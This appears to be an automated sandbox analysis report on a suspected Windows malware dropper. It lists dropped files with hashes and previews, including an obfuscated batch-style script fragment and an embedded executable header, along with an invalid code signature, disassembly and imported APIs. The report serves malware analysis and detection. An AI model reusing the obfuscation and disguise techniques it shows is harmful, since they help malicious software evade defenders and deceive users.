                                                                                                                                                                                    Preview:Set Lodging=H..fAK-Salad-Forever-Container-Anaheim-Airlines-Attention-..QPSqHimself-Prospect-Configured-Regarded-Requested-Warranty-W-..ewdCeltic-Title-Picked-Ali-Los-Running-Antique-Editor-..JpLimited-Briefing-Covered-Recall-Twenty-Dentists-Hazards-..WtLadder-Eos-Mechanics-Laundry-Fantasy-..svMFar-..Set Florists=i..XBZPetroleum-Respectively-Warming-Increased-Pike-Lite-Little-Pastor-Episode-..dEApr-Easter-Temporary-Lawn-Consists-Bear-Considering-..hpDecrease-Bangkok-Recruitment-Mario-..fTFeeding-Flyer-Leads-Formed-Beautiful-..fPjsRemoving-Burlington-Photograph-Ln-Starting-Hz-Pasta-Transparent-..bPIxOptional-Corner-Mysql-Sciences-Wheels-Nicaragua-..pSHearings-Marco-Troubleshooting-..OUfXGuide-Household-Crimes-Mom-Medicaid-Temporal-Boxed-Gui-Glossary-..Set Pos=Y..SYFaster-Immigrants-Organic-Overseas-Princess-Folks-Scientist-..VaFShows-Hazard-Arc-Surrey-Pursue-Perform-Coat-..IEnLesser-Senegal-Digit-Cleaning-..xnZBRelated-Smoking-Clinical-Nervous-..uuRely-Colleges-Vital-Owner-Elect-Unfortu
                                                                                                                                                                                    Process:C:\Users\user\Desktop\Yn13dTQdcW.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):138240
                                                                                                                                                                                    Entropy (8bit):6.40294617546759
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:Y6CV21YEsmnq7Cv/+/Coc5m+4Xf8O46895LmNpRGDox2S3hPt8gNpkU5uG3xYwBA:JCV26MqgQTc5F446iYNpK5SB7BJBzLA
                                                                                                                                                                                    MD5:E03C30773214DB59BDFBB950F16E76FC
                                                                                                                                                                                    SHA1:910E267F1191D0E9D2B452E17FDD1B440C837198
                                                                                                                                                                                    SHA-256:BC73025EDCB800214EA4F3B1A441375E25CFD8974F9D33094D43D7CE680C0736
                                                                                                                                                                                    SHA-512:501C8113396D29409AB48EBB6AB68E5D58C26896224F4C07ECB84DE01A64503E045F8676089172615B5B55CB6C1FBA32C4CA4B60F998E200C37B69D6224BBA14
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:integratedintlhandlingwaterproofcbperformtreasurertim..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.........................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\Desktop\Yn13dTQdcW.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):64223
                                                                                                                                                                                    Entropy (8bit):6.965090652910025
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:1d0bHazf0Tye4Ur2+9BSCVoyO15DuOKHnrxbxZiUCu2iPaLTQ7Q1tCwqVLwQVn8o:P0uZo2+9BBVgCOa1ZBPaPQaEwo0yv
                                                                                                                                                                                    MD5:A98E36DA94FEE7235BA0E64150C7FF48
                                                                                                                                                                                    SHA1:F9DDBC3EA30D065A3E8C4A293D1490B1833FC928
                                                                                                                                                                                    SHA-256:37D7D818F19DD754B66BF5C6E9AEDE3D05303925DE38F829591A02CF97E6D20D
                                                                                                                                                                                    SHA-512:BBFAAE8200F2E40D0235711CA3D879C60A3495DA831AE00AD838B08FB27A40DC2A6C4ECCB69AD89F0C25774801166BABBEF812FA729A78B7E10AC24742EA763A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:.+.8uy..w.i...Gw6...P..e'..H.i.....8...].....V.....9.............|..8.zc.kSY.=..T....'..l.qc:.|..q.f.U..m;.t..[g...:.'"..Mrlw...~.....MR.X.,.q..,y.....7....Ns`g....(U.....<....P...=.8.[.....2.V.<.....:/..bb..z*.+.....[.NT..... .vg.KG.]f.l..9..t....y1ZZZ|"..{L.yPG..Z..m.r|o7C.qW.cm..+.\.[..w.[....&.]=.....rlw..6;.T,...G..".....3T5 "}...T.X*l`Y./......OV][..`,[.9....FT.Vg3.vq....wD.orhg..C..:.l...........>U...e.T...V.......(Rm....sW.c1...N09....=.-...gx......IDZ........0..Z...q2U.,+`.....z.......H.Z...~.;.....^..oNpi|.$\*[|..$7g./.......Z...p.lQXw..........y..\w-.w.M.....K...w.....g..|...'..+......%X,[.:...... ..=.+.e.#.Nc.'.}...W...c......n..+.l....b...vw..;.t.Q..J.S.a.@.P.>......E........~:\nr..y..&..|.X..Y...m.$Zyl_..h.Z/V.........."...@.........M..a..._.9{s.7o..sP.Veb~...N:&]}7/`.'.C#..C[;.`.Jn..z..b.""...u..F.....!.o...4...q...V..d....'.>................?Gwu2.......k..<.#..Q........vv.y.@/.V.......*/.9y....%N^.al..z..3...
                                                                                                                                                                                    Process:C:\Users\user\Desktop\Yn13dTQdcW.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):59392
                                                                                                                                                                                    Entropy (8bit):6.592438940182233
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:DiuzNvt5DfExgYR5yiPl/UQ6JP04vDcmrIEVJRF:DNGR5yiPlcQ4NvoWV7F
                                                                                                                                                                                    MD5:06C3480CDD090D43901BA203C5D70598
                                                                                                                                                                                    SHA1:8498F092E0F8D676EC4533189BCA3BAD449BB92F
                                                                                                                                                                                    SHA-256:4BC85D083FA1229EDDC8FE9823CBCF65CE03F192ABF00678B6BFC53688E1BDA2
                                                                                                                                                                                    SHA-512:ECE2212698C1FB2E5DC11511558FDED1CE46076C7FFD8ECB856F617D5D5F3A68578D43A45E1EF05B3CCC9BF97D14A94C427D167B7D113B97F84C9B1E7EEE9D4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:...t....t....u..Z....M......>...../.....^]...V...>.....u..~..t.3.^.3.@^.y..u....3..V...j...V.0...Y..^...V..W3.9~.v..F......t.Q......F..$..G;~.r.f.._^.U..V..W.F.9F.uN...j.X;.r...3.F.j.Z.........Q.R....~....Yt..F...t....P.v.W....v........~.j.. .....Y..t..u..g..........3..N..F..<..F._^]...V......I..4....v..U...Y^.y...A.t..@..V...6.....V.5...Y..^...U..E.;A(|..M.j.j..<....-.U.R.Q P.q(.......M....Pj..u.......u....gJ.Y]...U........e..3.e..S.].V.u.W.C....E.......jN.U.Z.D..j...@..E..C.......f9P.Zuq.....S.Q......@..E..E.PVS..............M..7.....x]...C....f.x.Ou>.A..M........U..K.jN.......B...U....Yj.f9H.Yt..]....y..u......C..D....@.Pj{.F.u...3..3..........~..]............F;.|.].j..u.Q...........u..u.jz....5.......3..M......_..^[..]...U......8.E.VW.}.3..@..D$ ..I..t$$...t$(.t$,.L$........@..D$..d.L..T$...u9....L$0h.-I..d.L..........L..0...R..L$0.h.L.......L$..T$.;.h.L.u..u.W.u...T..........p...R..D$.......L$..@ .D$..D$..t$.PW.u..D$0P.u..8....xa.t$..L$......L$.;H.|1.t$..L
                                                                                                                                                                                    Process:C:\Users\user\Desktop\Yn13dTQdcW.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):64512
                                                                                                                                                                                    Entropy (8bit):7.99705892372434
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:1536:2rCWwRqC5gyt+esfDp8iMAakK/DJIxK/XMehFLz:2uWwRXN0eC8pEK/D2xK//
                                                                                                                                                                                    MD5:5F5127D492D9F1FF3F615D3AE6D06C70
                                                                                                                                                                                    SHA1:871CE9468718E513073F4AE6885F61D63DD37B94
                                                                                                                                                                                    SHA-256:8F144DD8BDED3E7B449D388A4C992148BF2FD278B7B56EF426C4A8B7D1624F32
                                                                                                                                                                                    SHA-512:19A79CC744FFA94D7567FE22CA0426D92F961D7681E48EB31880FB1F6216782C3C0527108CF5985B2539096BD47DF98F2DC1552769F17A19686F9D7F4AC969E3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:.=q....S....?;.R....f..[.J..@.j.0j..!3I..p;.......x.=............h.4...\.J....z`O.Z.@..,.........p.,..2..#....<.v.....LI*..0kay...TB.....i!.cK.....o...|.[.9.M.,x.FO.....a.x..b...T.........H>`.`l.|.L.'.4qU..$......0;..k..#...~.@...=.O.7]..,.....2)..6.E..[=ltLI......g..<.....g.m.1.u.DZ..k......!.4{.b5q:...\.._..KJ.BN....z.....T.k.i...-.H.o.".cN...;..r..V.1.....[.U!N.]..&R.O.#..7.a..(.R.b....+.D..6.Z.$..g..]..Lu.........n&.TiX..#/...p....c...TS.x.5Y..V.I..Qd8.A0...r..7.16YB..xm.F.r.i...q.D.}M_.>>.....+.F.......9.V{VZ..}...3j.(..S......T...8X2./..7zsT.rN...[..N.T........u..Q.8...d..F8.....M.ix.....a..0.J...^N..........y.......h.u=!.q.@Eg%...)m)..6...H4..]fmo.G....7\AT...%.u.U.....m.#hy_...r{.."...a...c.s....%....p0........!."m...r.l.)...1.....o.#._.-.&...W...i.{../.2.t......}...,;4....e.#.Lh.(6...H...h|0.t..m......AB<...E.~B...|%..gd...G....kEZ...../.... #..s..Q..P....!JU.......|/V.&.....E..?..O#.....rx...(..<U...^G2.....k.*..m
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (3359)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3364
                                                                                                                                                                                    Entropy (8bit):5.853334698404196
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:09PliRFd66666rVMfMxp2fbqlH88c3fffffo:0PKFd66666rVGkEucA
                                                                                                                                                                                    MD5:11ADCED266EAEB63E2C4AF81DDAB2067
                                                                                                                                                                                    SHA1:347C3F5EB6464253B917B9C63DC717D92470A1DD
                                                                                                                                                                                    SHA-256:AE6F91F017F1293B9E52F0ADA25612C5C7BC93F73AB1148256EE97CF5FD46E0E
                                                                                                                                                                                    SHA-512:CA92CD620F79FDCF80CBD22C8EE7403B3187BF750DA17F0C8D6B28439F11A7E054B1B936FCBF48F3545AEB7E557E0F0B57B353E63F7CAE805BA4BC367C39A14C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                    Preview:)]}'.["",["gervonta davis","mocha mousse pantone color","christmas music christmas songs","snow storm weather forecast","microsoft windows 11","wrangler nfr 2024","panda express panda hoodie","harry potter severus snape actor"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"google:entityinfo":"Cg0vZy8xMWJ6MHp2Nms4EhtBbWVyaWNhbiBwcm9mZXNzaW9uYWwgYm94ZXIy9w1kYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQVFBTUJJZ0FDRVFFREVRSC94QUFiQUFBQ0FnTUJBQUFBQUFBQUFBQUFBQUFGQmdRSEFRSURBUC9FQURNUUFBSUJBd01CQmdRRUJ3RUFBQUFBQUFFQ0F3QUVFUVVTSVRFR0V5SkJVWEVIRklHaEl6SmhzVUpTWXBHaTBlRVYvOFFBR1FFQUFnTUJBQUFBQUFBQUFBQUFBQUFBQW
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                    Entropy (8bit):3.9353986674667634
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                    MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                    SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                    SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                    SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                    Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):134277
                                                                                                                                                                                    Entropy (8bit):5.441928965390892
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:f0kX33ov7GsG688fJbk/5xnsOLWjwR2i6o:fv3lr6t2/5xnsOawR8o
                                                                                                                                                                                    MD5:02D0A0BB8834D083B0E467FECAA86F30
                                                                                                                                                                                    SHA1:E78CF643403A0FC962B2D77CE98C5C1F62C41A54
                                                                                                                                                                                    SHA-256:49B631B601C921B44BED84B5642DE2F2A131B7A83464B26350AEE4EF9F0C294C
                                                                                                                                                                                    SHA-512:0EA967AB60DEC898A15C845E7E50E6C273BF0A144054352FED20D0D934B1742B38F4F986F8C1BF89E2E02BCCBEEA08118B00F8968F9A247BADC8907D17892D64
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                    Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Entropy (8bit):7.97814839761367
                                                                                                                                                                                    TrID:
                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                    File name:Yn13dTQdcW.exe
                                                                                                                                                                                    File size:1'192'690 bytes
                                                                                                                                                                                    MD5:82ccd973e00420a4768bc76d2f442f52
                                                                                                                                                                                    SHA1:893c63dad01eb0367c11325efbf8492e193b15c3
                                                                                                                                                                                    SHA256:37919954152f36fb936ba48b6418c1172471ff9cc4627a7f3f941353e2c17b91
                                                                                                                                                                                    SHA512:cf6404af60401833f623ee9cd6732c451e97392b18b682a62adcddcdec17a062472c9385b13f585ef2a5a1e9bf1b8424409be95e1dce7b8a597124d4e801d599
                                                                                                                                                                                    SSDEEP:24576:Agkb+FVzgbGp2lwg27Rr+4rHSUgAEmEqnWbzv54qtpaxNlZzVWNFKQF5B1yrp:A672a2Q1byLPzB4qaX0Nbyrp
                                                                                                                                                                                    TLSH:E14523538F6D0C32DC961AB9FEF4952F6F36FA460880D1622305C5CC67A41817F69BBA
                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                                                                                                                    Icon Hash:0000000000000000
                                                                                                                                                                                    Entrypoint:0x4038af
                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                    Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                    File Version Major:5
                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                    Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                    • 28/04/2022 01:00:00 30/04/2025 00:59:59
                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                    • CN=LINE Corporation, OU=IT Service Center, O=LINE Corporation, L=Shinjuku-ku, S=Tokyo, C=JP, SERIALNUMBER=0111-01-089911, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=JP
                                                                                                                                                                                    Version:3
                                                                                                                                                                                    Thumbprint MD5:0316135C1FBED927AB33C4704F364ECB
                                                                                                                                                                                    Thumbprint SHA-1:97EED58F70035FB3A06A7350C6FD6004B1822AF2
                                                                                                                                                                                    Thumbprint SHA-256:9042594043A20B3C9ED1CFE26AA181B1A84C899E0084CD9A63EC6A76B035F215
                                                                                                                                                                                    Serial:09344CEB47DBDA41BD0D582C9218178A
                                                                                                                                                                                    Instruction
                                                                                                                                                                                    sub esp, 000002D4h
                                                                                                                                                                                    push ebx
                                                                                                                                                                                    push ebp
                                                                                                                                                                                    push esi
                                                                                                                                                                                    push edi
                                                                                                                                                                                    push 00000020h
                                                                                                                                                                                    xor ebp, ebp
                                                                                                                                                                                    pop esi
                                                                                                                                                                                    mov dword ptr [esp+18h], ebp
                                                                                                                                                                                    mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                    mov dword ptr [esp+14h], ebp
                                                                                                                                                                                    call dword ptr [00409030h]
                                                                                                                                                                                    push 00008001h
                                                                                                                                                                                    call dword ptr [004090B4h]
                                                                                                                                                                                    push ebp
                                                                                                                                                                                    call dword ptr [004092C0h]
                                                                                                                                                                                    push 00000008h
                                                                                                                                                                                    mov dword ptr [0047EB98h], eax
                                                                                                                                                                                    call 00007FF839049A9Bh
                                                                                                                                                                                    push ebp
                                                                                                                                                                                    push 000002B4h
                                                                                                                                                                                    mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                    lea eax, dword ptr [esp+38h]
                                                                                                                                                                                    push eax
                                                                                                                                                                                    push ebp
                                                                                                                                                                                    push 0040A264h
                                                                                                                                                                                    call dword ptr [00409184h]
                                                                                                                                                                                    push 0040A24Ch
                                                                                                                                                                                    push 00476AA0h
                                                                                                                                                                                    call 00007FF83904977Dh
                                                                                                                                                                                    call dword ptr [004090B0h]
                                                                                                                                                                                    push eax
                                                                                                                                                                                    mov edi, 004CF0A0h
                                                                                                                                                                                    push edi
                                                                                                                                                                                    call 00007FF83904976Bh
                                                                                                                                                                                    push ebp
                                                                                                                                                                                    call dword ptr [00409134h]
                                                                                                                                                                                    cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                    mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                    mov eax, edi
                                                                                                                                                                                    jne 00007FF83904706Ah
                                                                                                                                                                                    push 00000022h
                                                                                                                                                                                    pop esi
                                                                                                                                                                                    mov eax, 004CF0A2h
                                                                                                                                                                                    push esi
                                                                                                                                                                                    push eax
                                                                                                                                                                                    call 00007FF839049441h
                                                                                                                                                                                    push eax
                                                                                                                                                                                    call dword ptr [00409260h]
                                                                                                                                                                                    mov esi, eax
                                                                                                                                                                                    mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                    jmp 00007FF8390470F3h
                                                                                                                                                                                    push 00000020h
                                                                                                                                                                                    pop ebx
                                                                                                                                                                                    cmp ax, bx
                                                                                                                                                                                    jne 00007FF83904706Ah
                                                                                                                                                                                    add esi, 02h
                                                                                                                                                                                    cmp word ptr [esi], bx
                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                    • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                    • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                    • [LNK] VS2010 SP1 build 40219
                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x19fe.rsrc
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x11e0520x52a0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                    .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                    .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                    .rsrc0x1000000x19fe0x1a009cafdbb908c70e5895774afd22151f33False0.16165865384615385data1.828675345709303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .reloc0x1020000xfd60x100022f304909997cf1575460929ba1c5330False0.59814453125data5.588159694808622IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                    RT_ICON0x1001c00x19ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.3961352657004831
                                                                                                                                                                                    RT_ICON0x1003600x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.012067395264116576
                                                                                                                                                                                    RT_DIALOG0x1014880x100dataEnglishUnited States0.5234375
                                                                                                                                                                                    RT_DIALOG0x1015880x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                    RT_DIALOG0x1016a40x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                    RT_GROUP_ICON0x1017040x22dataEnglishUnited States0.9117647058823529
                                                                                                                                                                                    RT_MANIFEST0x1017280x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                                                                                                                                    DLLImport
                                                                                                                                                                                    KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                    USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                    SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                    ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
